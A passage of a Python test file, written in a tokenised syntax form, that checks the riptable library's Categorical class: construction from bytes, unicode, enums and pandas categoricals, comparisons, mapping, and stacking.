construction from unicode."<assert_stmt>(len(c_unicode._categories_wrap._list)<eq>4) f"Length of unique categories was incorrect for construction from unicode."<assert_stmt>(c_unicode._categories_wrap._list[0]<eq>b'a') f"Unique categories were not sorted for construction from unicode."<assert_stmt>c_unicode._categories_wrap._list.dtype.char<eq>'S' f"Unicode strings were not flipped to byte strings."<line_sep>c_true_unicode=Categorical(np.array(list_true_unicode))<assert_stmt>(c_true_unicode.dtype<eq>np.int8) f"Dtype {c_true_unicode.dtype} was not correct for construction from small list."<assert_stmt>(len(c_true_unicode)<eq>5) f"Length of underlying index array was incorrect for construction from true unicode."<assert_stmt>(len(c_true_unicode._categories_wrap._list)<eq>4) f"Length of unique categories was incorrect for construction from true 
unicode."<assert_stmt>(c_true_unicode._categories_wrap._list[0]<eq>u'a\u2082') f"Unique categories were not sorted for construction from true unicode."<assert_stmt>(c_true_unicode._categories_wrap._list.dtype.char<eq>'U') f"Unicode strings were not flipped to byte strings."<block_end><def_stmt>test_ctor_values_and_cats self<block_start>v_bytes=[b'IBM' b'AAPL' b'AMZN' b'IBM' b'hello']<line_sep>v_str=['IBM' 'AAPL' 'AMZN' 'IBM' 'hello']<line_sep>v_true=[u'IBM\u2082' u'AAPL\u2082' u'AMZN\u2082' u'IBM\u2082' u'hello\u2082' ]<line_sep>c_bytes=[b'AAPL' b'AMZN' b'IBM']<line_sep>c_str=['AAPL' 'AMZN' 'IBM']<line_sep>c_true=[u'AAPL\u2082' u'AMZN\u2082' u'IBM\u2082']<line_sep>v_correct=[2 0 1 2 3]<line_sep>c_correct=[b'AAPL' b'AMZN' b'IBM' b'inv']<line_sep>valid_v=[v_bytes v_str np.array(v_bytes) np.array(v_str) FastArray(v_bytes) FastArray(v_str) ]<line_sep>valid_c=[c_bytes c_str np.array(c_bytes) np.array(c_str) FastArray(c_bytes) FastArray(c_str) ]<for_stmt>v valid_v<block_start>vdt=<none><if_stmt>hasattr(v 'dtype')<block_start>vdt=v.dtype<block_end><else_stmt><block_start>vdt=type(v)<block_end><for_stmt>c valid_c<block_start>cdt=<none><if_stmt>hasattr(c 'dtype')<block_start>cdt=c.dtype<block_end><else_stmt><block_start>cdt=type(c)<block_end># error if no invalid provided
<with_stmt>pytest.raises(ValueError)<block_start>cat=Categorical(v c)<block_end># accept invalid and correctly assign
# cat = Categorical(v, c, invalid_category=b'inv')
# self.assertEqual(cat._categories.dtype.char, 'S', msg=f"Categorical from v: {vdt} and c: {cdt} did not flip categories to bytestring")
# v_is_correct = bool(np.all(v_correct == cat.view(FastArray)))
# self.assertTrue(v_is_correct, msg=f"Did not create the correct underlying index array from v: {vdt} and c: {cdt}")
# c_is_correct = bool(np.all(c_correct == cat._categories))
# self.assertTrue(c_is_correct, msg=f"Did not create the correct categories from v: {vdt} and c: {cdt}")
<block_end><block_end># v = v_true
# vdt = "TRUE unicode"
# for c in valid_c:
# if hasattr(c,'dtype'):
# cdt = c.dtype
# else:
# cdt = type(c)
# cat = Categorical(v,c)
<block_end># ---------------------------------------------------------------------------
<def_stmt>test_ctor_bad_index self<block_start>idx_list=[1 2 3 4 5]<line_sep>str_list=['a' 'b']<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(idx_list str_list)<block_end><block_end># ---------------------------------------------------------------------------
<def_stmt>test_ctor_non_unique self<block_start>'''
riptable categoricals, like pandas categoricals, do not allow a non-unique list of categories when an index array is provided.
'''<line_sep>idx_list=[0 1]<line_sep>str_list=['b' 'b' 'a']<line_sep>c=Categorical(idx_list str_list)<block_end># ---------------------------------------------------------------------------
<def_stmt>test_ctor_enum self<block_start>codes=[1 44 44 133 75]<line_sep>c=Categorical(codes LikertDecision)<block_end># ---------------------------------------------------------------------------
<def_stmt>test_compare_enum_int self<block_start>compare_func_names=['__ne__' '__eq__' '__ge__' '__gt__' '__le__' '__lt__' ]<line_sep>codes=[1 44 44 133 75]<line_sep>valid_idx=44<line_sep>bad_idx=43<line_sep>valid_idx_correct=[FastArray([<true> <false> <false> <true> <true>]) FastArray([<false> <true> <true> <false> <false>]) FastArray([<false> <true> <true> <true> <true>]) FastArray([<false> <false> <false> <true> <true>]) FastArray([<true> <true> <true> <false> <false>]) FastArray([<true> <false> <false> <false> <false>]) ]<line_sep>bad_idx_correct=[FastArray([<true> <true> <true> <true> <true>]) FastArray([<false> <false> <false> <false> <false>]) FastArray([<false> <true> <true> <true> <true>]) FastArray([<false> <true> <true> <true> <true>]) FastArray([<true> <false> <false> <false> <false>]) FastArray([<true> <false> <false> <false> <false>]) ]<for_stmt>d (LikertDecision decision_dict)<block_start>c=Categorical(codes d)<line_sep># test valid integer code
<for_stmt>name,correct zip(compare_func_names valid_idx_correct)<block_start>func=c.__getattribute__(name)<line_sep>result=func(valid_idx)<line_sep>was_correct=bool(np.all(correct<eq>result))<assert_stmt>(was_correct) f"Categorical enum comparison failed with good integer index on {name} operation. {c.view(FastArray)} code: {valid_idx}"<block_end># test invalid integer code
<for_stmt>name,correct zip(compare_func_names bad_idx_correct)<block_start>func=c.__getattribute__(name)<line_sep>result=func(bad_idx)<line_sep>was_correct=bool(np.all(correct<eq>result))<assert_stmt>was_correct f"Categorical enum comparison failed with good integer index on {name} operation"<block_end><block_end><block_end># ---------------------------------------------------------------------------
<def_stmt>test_compare_enum_str self<block_start>compare_func_names=['__ne__' '__eq__' '__ge__' '__gt__' '__le__' '__lt__' ]<line_sep>codes=[1 44 44 133 75]<line_sep>valid_idx='StronglyAgree'<line_sep>bad_idx='x'<line_sep>valid_idx_correct=[FastArray([<true> <false> <false> <true> <true>]) FastArray([<false> <true> <true> <false> <false>]) FastArray([<false> <true> <true> <true> <true>]) FastArray([<false> <false> <false> <true> <true>]) FastArray([<true> <true> <true> <false> <false>]) FastArray([<true> <false> <false> <false> <false>]) ]<for_stmt>d (LikertDecision decision_dict)<block_start>c=Categorical(codes d)<line_sep># test valid category string
<for_stmt>name,correct zip(compare_func_names valid_idx_correct)<block_start>func=c.__getattribute__(name)<line_sep>result=func(valid_idx)<line_sep>was_correct=bool(np.all(correct<eq>result))<assert_stmt>was_correct f"Categorical enum comparison failed with good category string on {name} operation"<block_end># test invalid category string
<for_stmt>name compare_func_names<block_start>func=c.__getattribute__(name)<with_stmt>pytest.raises(ValueError)<block_start>result=func(bad_idx)<block_end><block_end><block_end><block_end><def_stmt>test_map self<block_start>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false>)<line_sep>mapping={'a':'AA' 'b':'BB' 'c':'CC' 'd':'DD'}<line_sep>result=c.map(mapping)<line_sep>correct=FastArray([b'BB' b'BB' b'CC' b'AA' b'DD'])<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false> base_index=0)<line_sep>result=c.map(mapping)<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false>)<line_sep>mapping={'a':'AA' 'b':'BB' 'c':'CC'}<line_sep>result=c.map(mapping invalid='INVALID')<line_sep>correct=FastArray([b'BB' b'BB' b'CC' b'AA' b'INVALID'])<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false> base_index=0)<line_sep>result=c.map(mapping invalid='INVALID')<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false>)<line_sep>mapping={'a':1.0 'b':2.0 'c':3.0}<line_sep>result=c.map(mapping invalid=666)<line_sep>correct=FastArray([2.0 2.0 3.0 1.0 666.0])<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false> base_index=0)<line_sep>result=c.map(mapping invalid=666)<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false>)<line_sep>result=c.map(mapping)<assert_stmt>np.isnan(result[4])<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false> base_index=0)<line_sep>result=c.map(mapping)<assert_stmt>np.isnan(result[4])<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false>)<line_sep>mapping=FastArray(['w' 'x' 'y' 'z'])<line_sep>result=c.map(mapping)<line_sep>correct=FastArray([b'w' b'w' b'x' b'y' b'z'])<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false> base_index=0)<line_sep>result=c.map(mapping)<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical([2 2 3 1 4 0] ['a' 'b' 'c' 'd'])<line_sep>mapping={'a':1.0 'b':2.0 'c':3.0}<line_sep>result=c.map(mapping invalid=666)<line_sep>correct=FastArray([2.0 2.0 3.0 1.0 666.0 666.0])<assert_stmt>bool(np.all(result<eq>correct))<block_end># ---------------------------------------------------------------------------
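# --- illustrative summary (not part of the original tests) ---
# test_map() above pins down Categorical.map(): a dict (or an array indexed by
# category) maps each category to a new value; categories missing from the mapping
# take the `invalid` fill value, or NaN for numeric outputs when none is given, e.g.
#   Categorical(['b', 'b', 'c', 'a', 'd'], ordered=False).map(
#       {'a': 1.0, 'b': 2.0, 'c': 3.0}, invalid=666)   # -> [2.0, 2.0, 3.0, 1.0, 666.0]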
<def_stmt>test_from_category self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'])<line_sep>bin=c.from_category('a')<assert_stmt>bin<eq>1<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] base_index=0)<line_sep>bin=c.from_category(b'a')<assert_stmt>bin<eq>0<with_stmt>pytest.raises(ValueError)<block_start>bin=c.from_category('z')<block_end>c=Categorical(np.arange(5 10))<line_sep>bin=c.from_category(5)<assert_stmt>bin<eq>1<with_stmt>pytest.raises(ValueError)<block_start>bin=c.from_category(100)<block_end>c=Categorical([FastArray(['a' 'b' 'c']) np.arange(3)])<line_sep>bin=c.from_category(('c' 2))<assert_stmt>bin<eq>3<block_end># ---------------------------------------------------------------------------
<def_stmt>test_getitem_enum_int self<block_start>codes=[1 44 44 133 75]<line_sep>correct_strings=['StronglyDisagree' 'StronglyAgree' 'StronglyAgree' 'Agree' 'Disagree' ]<line_sep>c=Categorical(codes LikertDecision)<line_sep># getitem good init
<for_stmt>idx range(5)<block_start><assert_stmt>correct_strings[idx]<eq>c[idx] f"Failed to return correct string for valid index in categorical."<block_end># getitem bad init
<with_stmt>pytest.raises(IndexError)<block_start>result=c[5]<block_end><block_end># ---------------------------------------------------------------------------
<def_stmt>test_getitem_enum_int_list self<block_start>codes=[1 44 44 133 75]<line_sep>correct_strings=['StronglyDisagree' 'StronglyAgree' 'StronglyAgree' 'Agree' 'Disagree' ]<line_sep>c=Categorical(codes LikertDecision)<line_sep>result=c[[1 4]]<assert_stmt>isinstance(result Categorical) f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."<assert_stmt>result[0]<eq>'StronglyAgree'<assert_stmt>result[1]<eq>'Disagree'<line_sep>result=c[np.array([1 4])]<assert_stmt>isinstance(result Categorical) f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."<assert_stmt>result[0]<eq>'StronglyAgree'<assert_stmt>result[1]<eq>'Disagree'<line_sep>result=c[FastArray([1 4])]<assert_stmt>isinstance(result Categorical) f"Failed to return Categorical when indexing by integer list. Returned {type(result)} instead."<assert_stmt>result[0]<eq>'StronglyAgree'<assert_stmt>result[1]<eq>'Disagree'<block_end><def_stmt>test_getitem_enum self<block_start>self._notimpl()<block_end><def_stmt>test_setitem_enum self<block_start>self._notimpl()<block_end># -------------------------------------------- MATLAB ----------------------------------
<def_stmt>test_ctor_matlab self<block_start>idx_list=[1.0 2.0 3.0 4.0 5.0]<line_sep>str_list=['a' 'b' 'c' 'd' 'e']<with_stmt>pytest.raises(TypeError)<block_start>c=Categorical(idx_list str_list)<block_end>c=Categorical(idx_list str_list from_matlab=<true>)<assert_stmt>c[0]<eq>'a'<assert_stmt>c.dtype<eq>np.dtype(np.int8)<block_end># def test_ctor_matlab_non_unique(self):
# idx_list = [1.0, 2.0, 3.0, 4.0, 5.0]
# str_list = ['a','b','c','d','d']
# with self.assertRaises(ValueError, msg=f"Failed to raise error when MATLab categories were not unique."):
# c = Categorical(idx_list, str_list, from_matlab=True)
# ------------------------------- PANDAS CATEGORICAL ----------------------------------
<def_stmt>test_ctor_pandas_cat self<block_start>idx_list=[0 1 2 3 4]<line_sep>str_list=['a' 'b' 'c' 'd' 'e']<line_sep>pd_c=pd.Categorical.from_codes(idx_list str_list)<line_sep>pd_c=Categorical(pd_c)<line_sep>rt_c=Categorical(idx_list str_list)<line_sep>cats_match=bool(np.all(pd_c.category_array<eq>rt_c.category_array))<assert_stmt>cats_match f"Failed to create matching categories from pandas categorical"<line_sep># idx_match = bool(np.all(pd_c.view(np.ndarray)+1 == rt_c.view(np.ndarray)))
# self.assertTrue(idx_match, msg=f"Failed to create matching unerlying array from pandas categorical")
# convert pandas invalid bytes
pd_c=pd.Categorical.from_codes([-1 0 1 2] ['a' 'b' 'c'])<line_sep>pd_c=Categorical(pd_c)<line_sep>cat_list=pd_c.category_array<assert_stmt>len(cat_list)<eq>3<line_sep>no_negative=bool(np.all(pd_c.view(FastArray)<ge>0))<assert_stmt>no_negative<line_sep># convert pandas invalid unicode
pd_c=pd.Categorical.from_codes([-1 0 1 2] [u'\u2082' u'\u2083' u'\u2084'])<line_sep>pd_c=Categorical(pd_c)<line_sep>cat_list=pd_c.category_array<assert_stmt>len(cat_list)<eq>3<line_sep>no_negative=bool(np.all(pd_c.view(FastArray)<ge>0))<assert_stmt>no_negative<block_end># --------------------------------RIPTABLE CATEGORICAL ----------------------------------------
# def test_ctor_rt_cat(self):
# c_unicode = Categorical(list_unicode)
# c = c_unicode.copy(forceunicode=True)
# self.assertEqual(c._categories_wrap._list.dtype.char, 'U', msg=f"Failed to force unicode on categorical copy.")
# ------------------------------------CUSTOM CATEGORIES ----------------------------------
<def_stmt>test_ctor_list_unique self<block_start>unique_str=['a' 'b' 'c' 'd' 'e' 'f']<line_sep>str_list=['a' 'b' 'c' 'd' 'e']<line_sep>c=Categorical(str_list unique_str)<line_sep>cats_match=bool(np.all(c._categories_wrap._list<eq>unique_str))<assert_stmt>cats_match f"Failed to create matching categories from unique category input."<block_end># ------------------------------------INTEGER ARRAY ----------------------------------
<def_stmt>test_ctor_integer_array self<block_start>lis=[1 4 9 16 25]<line_sep>c=Categorical(lis)<for_stmt>v1,v2 zip(c lis)<block_start><assert_stmt>v1<eq>v2<block_end><block_end># ------------------------------------GARBAGE ----------------------------------
<def_stmt>test_ctor_garbage self<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categorical(1 2)<block_end><block_end># ------------------------------------TEST FORCE DTYPE ----------------------------------
<def_stmt>test_init_with_dtype self<block_start>int_types=[np.int8 np.int16 np.int32 np.int64]<line_sep>float_types=[np.float32 np.float64]<line_sep>uint_types=[np.uint8 np.uint16 np.uint32 np.uint64]<line_sep>arr=['a' 'b' 'c' 'd' 'e']<for_stmt>dt int_types<block_start>c=Categorical(arr dtype=dt)<assert_stmt>c.dtype<eq>dt f"Failed to force the correct dtype {dt} for categorical."<block_end><for_stmt>dt float_types+uint_types<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categorical(arr dtype=dt)<block_end><block_end><block_end># ------------------------------------TEST CONVERT VALUE-------------------------------------
<def_stmt>test_possibly_convert_value self<block_start>'''
TODO: fix for new Categories class
'''<line_sep>self._notimpl()<block_end><def_stmt>test_categories_bad_init self<block_start>tup=('a' 'b' 'c')<with_stmt>pytest.raises(TypeError)<block_start>cat=Categories(tup)<block_end><block_end><def_stmt>test_categories_len self<block_start>cats_from_list=Categorical(['a' 'b' 'c'] ordered=<true> base_index=1 filter=<none>)._categories_wrap<assert_stmt>len(cats_from_list)<eq>3<line_sep>cats_from_enum=Categorical(FastArray([144]) LikertDecision)._categories_wrap<assert_stmt>len(cats_from_enum)<eq>144<block_end><def_stmt>test_get_categories self<block_start>c_list=['StronglyAgree' 'Agree' 'Disagree' 'StronglyDisagree' 'NeitherAgreeNorDisagree' ]<line_sep>cats_from_list=Categories(c_list unicode=<true>)<line_sep>cats_from_enum=Categories(LikertDecision)<line_sep>get_cats_match=bool(np.all(cats_from_list.get_categories()<eq>cats_from_enum.get_categories()))<assert_stmt>get_cats_match<block_end><def_stmt>test_possibly_add_categories self<block_start>self._notimpl()<line_sep># uniquify and sort
# raise exception for adding cats to intenum, etc.
<block_end><def_stmt>test_categories_preserves_subtype self# Test the Categorical.categories() method preserves the array type for the category data.
# This is important because we want the array(s) returned by this method to have the same type
# as the internal data (i.e. what's returned by Categorical.category_array or Categorical.category_dict).
# Single-key Categorical
<block_start>dates=rt.Date(['2019-03-15' '2019-04-18' '2019-05-17' '2019-06-21' '2019-07-19' '2019-08-16' '2019-09-20' '2019-10-18' '2019-11-15' '2019-12-20' ])<line_sep>dates.name='dates'<line_sep>dates_cat=rt.Cat(dates)<line_sep>cats=dates_cat.categories()<assert_stmt>type(dates)<eq>type(cats)<line_sep># Multi-key Categorical
datestrs=rt.FA(['2019-03-15' '2019-04-18' '2019-05-17' '2019-06-21' '2019-07-19' '2019-08-16' '2019-09-20' '2019-10-18' '2019-11-15' '2019-12-20' ])<line_sep>datestrs.name='datestrs'<line_sep>mcat=rt.Cat([dates datestrs])<line_sep>mcats=mcat.categories()<assert_stmt>type(mcats['key_0'])<eq>type(dates)<assert_stmt>type(mcats['key_1'])<eq>type(datestrs)<line_sep># Empty single-key Categorical
dates=rt.Date([])<line_sep>dates_cat=rt.Cat(dates)<line_sep>cats=dates_cat.categories()<assert_stmt>type(dates)<eq>type(cats)<block_end><def_stmt>test_make_unique self# SJK: changed this test on 8/21/2018 - count now comes from the grouping object, not Categories.make unique
<block_start>values=FastArray(['a' 'b' 'c' 'c' 'd' 'a' 'b'])<line_sep># c = Categories([],base_index=1)
# index, cat_len, filter = c.make_unique(values)
cat=Categorical(values ordered=<true> base_index=1 filter=<none>)<line_sep>index=cat._fa<line_sep>c=cat._categories_wrap<assert_stmt>len(index)<eq>7<assert_stmt>max(index)<eq>4<assert_stmt>c._mode<eq>CategoryMode.StringArray<assert_stmt>c._list.dtype.char<eq>'S'<assert_stmt>c.isbytes<line_sep>univals=values.astype('U')<line_sep>cat=Categorical(univals ordered=<true> base_index=1 filter=<none> unicode=<true>)<line_sep>index=cat._fa<line_sep>c=cat._categories_wrap<assert_stmt>len(index)<eq>7<assert_stmt>max(index)<eq>4<assert_stmt>c._mode<eq>CategoryMode.StringArray<assert_stmt>c._list.dtype.char<eq>'U'<assert_stmt>c.isunicode<block_end>@pytest.mark.xfail(reason='20200416 This test was previously overridden by a later test in the file with the same name. Need to revisit and get back in a working state.')<def_stmt>test_force_base_index self<block_start>filter=FastArray([<true> <true> <false> <false> <true>])<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'])<assert_stmt>c.base_index<eq>1 'Did not default base index to 1'<assert_stmt>c._fa[0]<eq>1 'Did not default base index to 1'<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] base_index=0)<assert_stmt>c.base_index<eq>0 'Did not force base index to 0'<assert_stmt>c._fa[0]<eq>0 'Did not force base index to 0'<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] filter=filter)<assert_stmt>len(c.category_array)<eq>1<assert_stmt>c._fa[2]<eq>0 'Did not default base index to 1'<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] base_index=0 filter=filter)<assert_stmt>len(c.category_array)<eq>1<assert_stmt>c._fa[2]<eq>INVALID_DICT[c.dtype.num] 'Did not force base index to 0'<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'] base_index=99 filter=filter)<block_end>c=Categorical(['a' 'a' 'b' 'c' 'a'] ['a' 'b' 'c'])<assert_stmt>c.base_index<eq>1 'Did not default base index to 1'<assert_stmt>c._fa[0]<eq>1 'Did not default base index to 1'<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'a'] ['a' 'b' 'c'] base_index=0)<assert_stmt>c.base_index<eq>0 'Did not force base index to 0'<assert_stmt>c._fa[0]<eq>0 'Did not force base index to 0'<with_stmt>pytest.raises(NotImplementedError)<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'] ['a' 'b' 'c'] base_index=0 filter=filter)<block_end><with_stmt>pytest.raises(ValueError)<block_start>c=Categorical([1.0 2.0 3.0] ['a' 'b' 'c'] from_matlab=<true> base_index=0)<block_end>pdc=pd.Categorical(['a' 'a' 'b' 'c' 'a'])<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(pdc base_index=0)<block_end><block_end><def_stmt>test_is_in_unique_strings self<block_start>values=['a' 'b' 'c' 'c' 'd' 'a' 'b']<line_sep>good_cats=['a' 'b' 'c' 'd']<line_sep>incomplete_cats=['a' 'b' 'c']<line_sep>bad_cats=['a' 'a' 'b']<line_sep>invalid='invalid'<line_sep>###--------REMOVED from_provided_categories, rewrite these tests to go through main constructor
# valid bytes
c=Categorical(values good_cats ordered=<true> base_index=1 unicode=<false> filter=<none>)<line_sep>cats=c._categories_wrap<assert_stmt>len(c)<eq>7<assert_stmt>max(c._fa)<eq>4<assert_stmt>cats._mode<eq>CategoryMode.StringArray<assert_stmt>cats._list.dtype.char<eq>'S'<assert_stmt>cats.isbytes<line_sep># valid unicode
c=Categorical(values good_cats ordered=<true> base_index=1 unicode=<true> filter=<none>)<line_sep>cats=c._categories_wrap<assert_stmt>len(c)<eq>7<assert_stmt>max(c._fa)<eq>4<assert_stmt>cats._mode<eq>CategoryMode.StringArray<assert_stmt>cats._list.dtype.char<eq>'U'<assert_stmt>cats.isunicode<line_sep># non-unique categories
# 4/12/2019 - no longer checks for uniqueness
# with self.assertRaises(ValueError):
# c = Categories.from_provided_categories(values, bad_cats, ordered=True, base_index=1, unicode=False, filter=None)
# not all values found in categories
<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(values incomplete_cats ordered=<true> base_index=1 unicode=<false> filter=<none> )<block_end># insert invalid True
# 5/16/2019 invalid must appear in provided uniques
<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(values incomplete_cats ordered=<true> base_index=1 unicode=<true> filter=<none> invalid=invalid )<line_sep>cats=c._categories_wrap<assert_stmt>len(c)<eq>7<assert_stmt>max(c._fa)<eq>3<assert_stmt>cats._mode<eq>CategoryMode.StringArray<assert_stmt>cats._list.dtype.char<eq>'U'<assert_stmt>cats.isunicode<block_end><block_end><def_stmt>test_getitem_enum_str self<block_start>codes=[1 44 44 133 75]<line_sep>correct=[<true> <false> <false> <false> <false>]<line_sep>valid_str='StronglyDisagree'<line_sep>invalid_str='q'<line_sep>c=Categorical(codes LikertDecision)<line_sep># with self.assertRaises(IndexError):
mask=c[valid_str]<line_sep>is_correct=bool(np.all(mask<eq>correct))<assert_stmt>is_correct<with_stmt>pytest.raises(ValueError)<block_start>mask=c[invalid_str]<assert_stmt>sum(mask)<eq>0<block_end><block_end><def_stmt>test_match_str_to_category self<block_start>single_byte=b'a'<line_sep>single_unicode='a'<line_sep>single_true_unicode=u'\u2082'<line_sep>byte_values=[b'a' b'b' b'c' b'c' b'd' b'a' b'b']<line_sep>values=FastArray(['a' 'b' 'c' 'c' 'd' 'a' 'b'])<line_sep>true_unicode=[u'\u2082' u'\u2083' u'\u2082']<line_sep># 4/25/2019 - changed these tests to construct a Categorical, rather than
# a Categories object directly. Categorical will always make a Categories object.
# (held in _categories_wrap)
c=Categorical(values ordered=<true> base_index=1 filter=<none>)<line_sep>matching_char=c._categories_wrap.match_str_to_category(single_unicode)<assert_stmt>isinstance(matching_char bytes)<with_stmt>pytest.raises(TypeError)<block_start>matching=c._categories_wrap.match_str_to_category(single_true_unicode)<block_end>univals=np.array(['a' 'b' 'c' 'c' 'd' 'a' 'b'])<line_sep>c=Categorical(univals ordered=<true> base_index=1 filter=<none> unicode=<true>)<line_sep>matching_char=c._categories_wrap.match_str_to_category(single_byte)<assert_stmt>isinstance(matching_char str)<line_sep>c=Categorical(values ordered=<true> base_index=1 filter=<none>)<line_sep>matching=c._categories_wrap.match_str_to_category(values)<assert_stmt>matching.dtype.char<eq>'S'<with_stmt>pytest.raises(TypeError)<block_start>matching=c._categories_wrap.match_str_to_category(true_unicode)<block_end>c=Categorical(univals ordered=<true> base_index=1 filter=<none> unicode=<true>)<line_sep>matching=c._categories_wrap.match_str_to_category(values)<assert_stmt>matching.dtype.char<eq>'U'<block_end># Categories object being removed
# Disabling these tests - methods will move into Categorical
# 4/24/2019
# def test_get_category_index(self):
# values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g'])
# _, c, _, _ = Categories.from_array(values, ordered=True, base_index=1, filter=None)
# # when found, will return exact index
# str_idx = c.get_category_index('b')
# self.assertEqual(str_idx, 2)
# # when ordered, will return floating point for LTE GTE
# str_idx = c.get_category_index('e')
# self.assertEqual(str_idx, 4.5)
# # when unordered, will return invalid index (length of string array)
# c._sorted = False
# str_idx = c.get_category_index('e')
# self.assertEqual(str_idx, 6)
# def test_get_category_match_index(self):
# values = FastArray(['a', 'b', 'c', 'c', 'd', 'a', 'b', 'g'])
# _, c, _, _ = Categories.from_array(values, ordered=False, base_index=1, filter=None)
# string_matches = c.get_category_match_index(['a','b'])
# self.assertEqual(string_matches, [1,2])
# c._mode = CategoryMode.IntEnum
# with self.assertRaises(NotImplementedError):
# string_matches = c.get_category_match_index(['a','b'])
<def_stmt>test_possibly_invalid self<block_start>values=['a' 'b' 'c' 'c' 'd' 'a' 'b' 'g']<line_sep>c=Categorical(values base_index=1)<line_sep>out_of_range=-50<line_sep>sentinel=INVALID_DICT[c.dtype.num]<line_sep>c.view(FastArray)[0]=out_of_range<line_sep># c.view(FastArray)[1] = sentinel
# **changed invalid, all will display as bad code if changed underneath and not in range
<assert_stmt>c[0]<eq>"!<-50>"<line_sep># self.assertEqual(c[1], "!<inv>")
<block_end><def_stmt>test_categories_getitem_str_list self<block_start>codes=[1 44 44 133 75]<line_sep>correct=FastArray([<false> <true> <true> <false> <true>])<line_sep>c=Categorical(codes LikertDecision)<line_sep>mask=c[['StronglyAgree' 'Disagree']]<line_sep>is_correct=bool(np.all(mask<eq>correct))<assert_stmt>is_correct<line_sep>mask=c[[b'StronglyAgree' b'Disagree']]<line_sep>is_correct=bool(np.all(mask<eq>correct))<assert_stmt>is_correct<block_end><def_stmt>test_categories_print_repr self<block_start>self._notimpl()<block_end><def_stmt>test_enum_dict_warning self<block_start><class_stmt>DupeEnum(IntEnum)<block_start>code_a=1<line_sep>code_b=1<line_sep>code_c=1<line_sep>code_d=2<block_end><with_stmt>pytest.warns(UserWarning)<block_start>c=Categorical([1 2] DupeEnum)<block_end><block_end># ------------------------- TEST MERGE -------------------------------------------
# def test_merge(self):
# from riptable.rt_categorical import categorical_merge
# c_bytes = Categorical(['b','b','b','a','b','b'], ['a','b'])
# c_unicode = Categorical(["AAPL\u2080","AMZN\u2082"])
# result = categorical_merge([c_bytes, c_unicode])
# # self.assertTrue(result[0]._categories_wrap._list is result[1]._categories_wrap._list, msg=f"Categorical merge did not assign the same dictionary to both arrays.")
# self.assertEqual(result[0]._categories_wrap._list.dtype.char, 'U', msg=f"{result[0]._categories_wrap._list.dtype.char} was not 'U'. dictionary was not flipped to unicode.")
# for item in c_bytes._categories_wrap._list:
# self.assertTrue(item.decode() in result[0]._categories_wrap._list, msg=f"{item} did not appear in final categories")
# for item in c_unicode._categories_wrap._list:
# self.assertTrue(item in result[0]._categories_wrap._list, msg=f"{item} did not appear in final categories")
# c1 = Categorical([1, 1, 3, 2, 2], [1, 2, 3, 4, 5], from_matlab=True)
# c2 = Categorical([2, 2, 4, 4, 3], [1, 2, 3, 4, 5], from_matlab=True)
# [cm1, cm2] = categorical_merge([c1, c2])
# self.assertTrue((cm1 == [1, 1, 3, 2, 2]).all())
# self.assertTrue((cm2 == [2, 2, 4, 4, 3]).all())
# ------------------------- TEST HSTACK -------------------------------------------
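# Illustrative sketch only (not one of the original tests): hstack re-maps each input
# Categorical's integer codes onto a combined category set, so the stacked result
# round-trips back to the original values, e.g. (mirrors the pattern in test_hstack below):
# c1 = Categorical(['a', 'b']); c2 = Categorical(['b', 'c'])
# cm = Categorical.hstack([c1, c2])
# assert (cm.as_string_array == ['a', 'b', 'b', 'c']).all()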
<def_stmt>test_hstack self<block_start>c1=Categorical(['a' 'a' 'c' 'b' 'b'])<line_sep>c2=Categorical(['b' 'b' 'd' 'd' 'c'])<line_sep>cm=Categorical.hstack([c1 c2])<assert_stmt>(cm.as_string_array<eq>['a' 'a' 'c' 'b' 'b' 'b' 'b' 'd' 'd' 'c']).all()<line_sep>c1=Categorical([1 1 3 2 2] [1 2 3 4 5] from_matlab=<true>)<line_sep>c2=Categorical([2 2 4 4 3] [1 2 3 4 5] from_matlab=<true>)<line_sep>cm=Categorical.hstack([c1 c2])<assert_stmt>(cm<eq>[1 1 3 2 2 2 2 4 4 3]).all()<block_end><def_stmt>test_hstack_fails_for_different_mode_cats self# Create a dictionary-mode Categorical (from ISO3166 data).
# The dictionary is created manually below instead of using e.g.
# {k: int(v) for (k, v) in ISOCountryCode.__members__.items()}
# so that the insertion order of the dictionary we give to Categorical does not
# imply an ordering of the keys/values.
<block_start>country_code_dict={'IRL':372 'USA':840 'AUS':36 'HKG':344 'JPN':392 'MEX':484 'KHM':116 'THA':764 'JAM':388 'ARM':51}<line_sep># The values for the Categorical's backing array.
# This includes some value(s) not in the dictionary and not all values in the dictionary are used here.
